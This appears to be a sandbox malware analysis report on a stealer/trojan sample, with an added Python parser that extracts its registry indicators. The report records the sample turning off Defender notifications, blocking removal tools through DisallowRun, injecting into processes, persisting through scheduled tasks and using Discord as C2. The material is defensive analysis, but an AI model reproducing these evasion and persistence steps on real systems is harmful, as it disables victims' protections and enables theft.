Malware Analysis Report

2024-12-07 14:47

Sample ID 241007-mpm6xa1arm
Target 1cfa59cf9fe17fbacc47910d45236945_JaffaCakes118
SHA256 3412cec072f1a9b403fcc7d2e8de28d0bde2d3a5a2e39089c519c2d12646b644
Tags
defense_evasion discovery evasion execution exploit spyware stealer trojan upx
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

3412cec072f1a9b403fcc7d2e8de28d0bde2d3a5a2e39089c519c2d12646b644

Threat Level: Known bad

The file 1cfa59cf9fe17fbacc47910d45236945_JaffaCakes118 was found to be: Known bad.

Malicious Activity Summary

defense_evasion discovery evasion execution exploit spyware stealer trojan upx

Modifies security service

Suspicious use of NtCreateUserProcessOtherParentProcess

Modifies Windows Defender notification settings

Detected Nirsoft tools

NirSoft WebBrowserPassView

Command and Scripting Interpreter: PowerShell

Possible privilege escalation attempt

Blocks application from running via registry modification

Loads dropped DLL

Checks BIOS information in registry

Checks computer location settings

Executes dropped EXE

Reads user/profile data of web browsers

Indicator Removal: Clear Windows Event Logs

Modifies file permissions

Looks up external IP address via web service

Legitimate hosting services abused for malware hosting/C2

File and Directory Permissions Modification: Windows File and Directory Permissions Modification

Suspicious use of SetThreadContext

Drops file in System32 directory

UPX packed file

Drops file in Windows directory

Enumerates physical storage devices

Browser Information Discovery

Unsigned PE

System Location Discovery: System Language Discovery

Suspicious use of FindShellTrayWindow

Suspicious use of WriteProcessMemory

Modifies data under HKEY_USERS

Suspicious behavior: CmdExeWriteProcessMemorySpam

Checks SCSI registry key(s)

Suspicious behavior: EnumeratesProcesses

Checks processor information in registry

Scheduled Task/Job: Scheduled Task

Uses Task Scheduler COM API

Suspicious use of SetWindowsHookEx

Enumerates system info in registry

Modifies registry class

Kills process with taskkill

Delays execution with timeout.exe

Suspicious use of AdjustPrivilegeToken

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-10-07 10:38

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-10-07 10:38

Reported

2024-10-07 10:41

Platform

win7-20240729-en

Max time kernel

149s

Max time network

150s

Command Line

winlogon.exe

Signatures

Modifies Windows Defender notification settings

evasion trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications C:\Windows\system32\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications\DisableEnhancedNotifications = "1" C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications C:\Windows\system32\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications\DisableNotifications = "1" C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications C:\Windows\system32\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications\DisableEnhancedNotifications = "1" C:\Windows\system32\reg.exe N/A

Modifies security service

evasion
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\MpsSvc\Parameters\PortKeywords\DHCP C:\Windows\System32\svchost.exe N/A
Set value (data) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\MpsSvc\Parameters\PortKeywords\DHCP\Collection C:\Windows\System32\svchost.exe N/A

Suspicious use of NtCreateUserProcessOtherParentProcess

Description Indicator Process Target
PID 1608 created 432 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\system32\winlogon.exe
PID 1516 created 432 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\system32\winlogon.exe

Detected Nirsoft tools

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

NirSoft WebBrowserPassView

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Blocks application from running via registry modification

evasion
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun C:\Windows\system32\reg.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun = "1" C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\5 = "MBSetup.exe" C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\7 = "mbar.exe" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\2 = "rkill.exe" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\3 = "rkill32.exe" C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\6 = "mbam.exe" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\1 = "MRT.exe" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\4 = "rkill64.exe" C:\Windows\system32\reg.exe N/A
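
The Defender notification, MpsSvc and DisallowRun tables above are flattened "Description Indicator Process Target" rows. The parser below is an added example, not part of the report or of the sandbox that produced it; it rebuilds those rows into events and answers the two questions a responder asks first: which programs the DisallowRun policy now blocks, and which Security Center notification switches were set. DisallowRun is an Explorer policy: it stops the shell (double-click, Start menu, Run dialog) from launching the listed executables for that one user SID, and it does not stop the same programs being started by other means, so the list is better read as a statement of which tools the author expects to meet (Malwarebytes installers and scanners, RKill, and MRT.exe, the Microsoft Malicious Software Removal Tool). The MpsSvc row is written by svchost.exe, the host of the Windows Firewall service, rather than by one of the sample's own processes, so that signature carries little weight on its own. The code assumes the Process and Target columns contain no spaces, which holds for every row in this report; the sample rows are copied from the tables above.

```python
from __future__ import annotations

import re
from dataclasses import dataclass
from typing import Optional


@dataclass(frozen=True)
class RegEvent:
    op: str               # "Key created", "Key opened", "Set value", ...
    vtype: Optional[str]  # int / str / data for "Set value" rows
    key: str              # hive-normalised key (HKLM\..., HKU\<SID>\...)
    name: Optional[str]   # value name for "Set value" rows
    value: Optional[str]  # value data with surrounding quotes stripped, if the row had one
    process: str
    target: str


_RE_ROW = re.compile(
    r"^(?P<op>Key created|Key opened|Key deleted|Delete value|Set value \((?P<vtype>\w+)\))\s+(?P<rest>.+)$")

# Constructed sample input: rows copied from the signature tables above, in page order.
_EXPLORER = r"\REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer"
_NOTIF = r"\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications"
_REG = r"C:\Windows\system32\reg.exe N/A"


def _disallow_row(index: int, exe: str) -> str:
    return rf'Set value (str) {_EXPLORER}\DisallowRun\{index} = "{exe}" {_REG}'


SAMPLE_REG_ROWS = [
    rf"Key created {_NOTIF} {_REG}",
    rf'Set value (int) {_NOTIF}\DisableEnhancedNotifications = "1" {_REG}',
    rf'Set value (int) {_NOTIF}\DisableNotifications = "1" {_REG}',
    r"Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\MpsSvc\Parameters\PortKeywords\DHCP C:\Windows\System32\svchost.exe N/A",
    r"Set value (data) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\MpsSvc\Parameters\PortKeywords\DHCP\Collection C:\Windows\System32\svchost.exe N/A",
    rf'Set value (int) {_EXPLORER}\DisallowRun = "1" {_REG}',
    _disallow_row(5, "MBSetup.exe"), _disallow_row(7, "mbar.exe"), _disallow_row(2, "rkill.exe"),
    _disallow_row(3, "rkill32.exe"), _disallow_row(6, "mbam.exe"), _disallow_row(1, "MRT.exe"),
    _disallow_row(4, "rkill64.exe"),
]


def normalize_hive(path: str) -> str:
    """Rewrite the kernel object path prefix into the HKLM/HKU form used by reg.exe."""
    for prefix, hive in (("\\REGISTRY\\MACHINE\\", "HKLM\\"), ("\\REGISTRY\\USER\\", "HKU\\")):
        if path.upper().startswith(prefix):
            return hive + path[len(prefix):]
    return path


def parse_row(line: str) -> Optional[RegEvent]:
    m = _RE_ROW.match(line.strip())
    if not m:
        return None
    # Process and Target are the last two fields (assumption: no spaces in those paths).
    parts = m["rest"].rsplit(None, 2)
    if len(parts) != 3:
        return None
    body, process, target = parts
    path, sep, value = body.partition(" = ")
    value = value.strip('"') if sep else None
    op, name = ("Set value", None) if m["vtype"] else (m["op"], None)
    if op == "Set value":
        path, _, name = path.rpartition("\\")   # last component is the value name
    return RegEvent(op, m["vtype"], normalize_hive(path), name, value, process, target)


def parse_rows(lines) -> list[RegEvent]:
    return [ev for ev in (parse_row(l) for l in lines) if ev is not None]


def disallowed_programs(events) -> list[str]:
    """Executables named under Policies\\Explorer\\DisallowRun, ordered by their index."""
    entries = [e for e in events if e.op == "Set value" and e.name and e.name.isdigit()
               and e.key.lower().endswith("\\policies\\explorer\\disallowrun")]
    return [e.value for e in sorted(entries, key=lambda e: int(e.name))]


def disallowrun_enabled(events) -> bool:
    return any(e.op == "Set value" and (e.name or "").lower() == "disallowrun" and e.value == "1"
               and e.key.lower().endswith("\\policies\\explorer") for e in events)


def defender_notification_flags(events) -> dict[str, str]:
    return {e.name: e.value for e in events if e.op == "Set value" and e.name
            and e.key.lower().endswith("windows defender security center\\notifications")}


if __name__ == "__main__":
    evs = parse_rows(SAMPLE_REG_ROWS)
    print("DisallowRun enabled:", disallowrun_enabled(evs))
    print("Blocked by Explorer:", disallowed_programs(evs))
    print("Defender notification flags:", defender_notification_flags(evs))
```

Running it prints the seven blocked names in index order (MRT.exe first, mbar.exe last) and both notification flags set to 1; the same functions can be pointed at the full signature export of a report rather than the hand-copied rows.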

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Possible privilege escalation attempt

exploit
Description Indicator Process Target
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\takeown.exe N/A

Modifies file permissions

discovery
Description Indicator Process Target
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A

Reads user/profile data of web browsers

spyware stealer

File and Directory Permissions Modification: Windows File and Directory Permissions Modification

defense_evasion

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A api64.ipify.org N/A N/A
N/A ip-api.com N/A N/A
N/A api64.ipify.org N/A N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
File opened for modification C:\Windows\SysWOW64\WindowsPowerShell\v1.0\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE N/A
File opened for modification C:\Windows\system32\Recovery C:\Windows\system32\ReAgentc.exe N/A
File opened for modification C:\Windows\system32\Recovery\ReAgent.xml C:\Windows\system32\ReAgentc.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 1608 set thread context of 1740 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\System32\dllhost.exe
PID 1516 set thread context of 1392 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\SysWOW64\dllhost.exe

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\Tasks\$77svc64.job C:\Users\Admin\AppData\Local\Microsoft\Windows\Install.exe N/A
File opened for modification C:\Windows\Tasks\$77svc64.job C:\Users\Admin\AppData\Local\Microsoft\Windows\Install.exe N/A
File opened for modification C:\Windows\Tasks\$77svc64.job C:\Windows\system32\svchost.exe N/A
File opened for modification C:\Windows\appcompat\programs\RecentFileCache.bcf C:\Windows\system32\svchost.exe N/A
File opened for modification C:\Windows\Tasks\$77svc32.job C:\Windows\system32\svchost.exe N/A
File created C:\Windows\Tasks\$77svc32.job C:\Users\Admin\AppData\Local\Microsoft\Windows\Install.exe N/A
File opened for modification C:\Windows\Tasks\$77svc32.job C:\Users\Admin\AppData\Local\Microsoft\Windows\Install.exe N/A

Browser Information Discovery

discovery

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Microsoft\Windows\$77STLR.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Microsoft\Windows\Install.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\winhlp32.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\splwow64.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\1cfa59cf9fe17fbacc47910d45236945_JaffaCakes118.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\$77Redownloader.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\dllhost.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\snuvcdsm.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\hh.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\xwizard.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\$77main1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE N/A

Delays execution with timeout.exe

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\taskkill.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = e0d04b1da518db01 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RtkBtManServ.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\system32\wbem\wmiprvse.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RtkBtManServ.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\system32\wbem\wmiprvse.exe N/A
N/A N/A C:\Windows\system32\wbem\wmiprvse.exe N/A
N/A N/A C:\Windows\system32\wbem\wmiprvse.exe N/A
N/A N/A C:\Windows\system32\wbem\wmiprvse.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Microsoft\Windows\$77Stellacy.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RtkBtManServ.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\dllhost.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\wbem\wmiprvse.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\dllhost.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\system32\svchost.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\$77Redownloader.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1760 wrote to memory of 2880 N/A C:\Users\Admin\AppData\Local\Temp\1cfa59cf9fe17fbacc47910d45236945_JaffaCakes118.exe C:\Users\$77main1.exe
PID 1760 wrote to memory of 2880 N/A C:\Users\Admin\AppData\Local\Temp\1cfa59cf9fe17fbacc47910d45236945_JaffaCakes118.exe C:\Users\$77main1.exe
PID 1760 wrote to memory of 2880 N/A C:\Users\Admin\AppData\Local\Temp\1cfa59cf9fe17fbacc47910d45236945_JaffaCakes118.exe C:\Users\$77main1.exe
PID 1760 wrote to memory of 2880 N/A C:\Users\Admin\AppData\Local\Temp\1cfa59cf9fe17fbacc47910d45236945_JaffaCakes118.exe C:\Users\$77main1.exe
PID 2880 wrote to memory of 2936 N/A C:\Users\$77main1.exe C:\Windows\system32\cmd.exe
PID 2880 wrote to memory of 2936 N/A C:\Users\$77main1.exe C:\Windows\system32\cmd.exe
PID 2880 wrote to memory of 2936 N/A C:\Users\$77main1.exe C:\Windows\system32\cmd.exe
PID 2880 wrote to memory of 2936 N/A C:\Users\$77main1.exe C:\Windows\system32\cmd.exe
PID 2936 wrote to memory of 2980 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2936 wrote to memory of 2980 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2936 wrote to memory of 2980 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2936 wrote to memory of 1960 N/A C:\Windows\system32\cmd.exe C:\Users\$77Redownloader.exe
PID 2936 wrote to memory of 1960 N/A C:\Windows\system32\cmd.exe C:\Users\$77Redownloader.exe
PID 2936 wrote to memory of 1960 N/A C:\Windows\system32\cmd.exe C:\Users\$77Redownloader.exe
PID 2936 wrote to memory of 1960 N/A C:\Windows\system32\cmd.exe C:\Users\$77Redownloader.exe
PID 2936 wrote to memory of 2860 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2936 wrote to memory of 2860 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
